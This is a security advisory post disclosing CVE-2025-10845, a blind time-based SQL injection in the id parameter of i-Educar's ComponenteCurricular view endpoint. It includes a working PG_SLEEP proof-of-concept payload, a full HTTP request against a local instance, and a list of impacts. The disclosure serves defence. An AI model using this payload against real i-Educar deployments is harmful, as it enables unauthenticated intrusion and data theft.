Featured image of post CVE-2025-10845
SQL Injection Critical I-Educar Security WebApp

CVE-2025-10845

SQL Injection

CVE-2025-10845: SQL Injection (Blind Time-Based) Vulnerability in id Parameter on module/ComponenteCurricular/view Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-10845

Summary

A SQL Injection vulnerability was discovered in the id parameter of the module/ComponenteCurricular/view endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.

Details

The application fails to properly sanitize user-supplied input in the id parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.

PoC

Vulnerable Endpoint: module/ComponenteCurricular/view

Parameter: id

Payload:

1

' AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND 'QDaZ'='QDaZ

Example Request

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

GET /module/ComponenteCurricular/view?id=8%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ HTTP/1.1
Host: localhost:8086
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/138.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE
Connection: keep-alive

This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.

Normal request:

SQLi Request:

Observe the time delay in the server response, indicating the successful execution of the SQL payload.

Impact

  • Unauthorized access to sensitive data (e.g., users, passwords, logs).
  • Database enumeration (schemas, tables, users, versions).
  • Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).
  • Full compromise of the application if chained with other vulnerabilities.
  • This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.

Reference

https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10845.md

Finder

Karina Gante

By: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy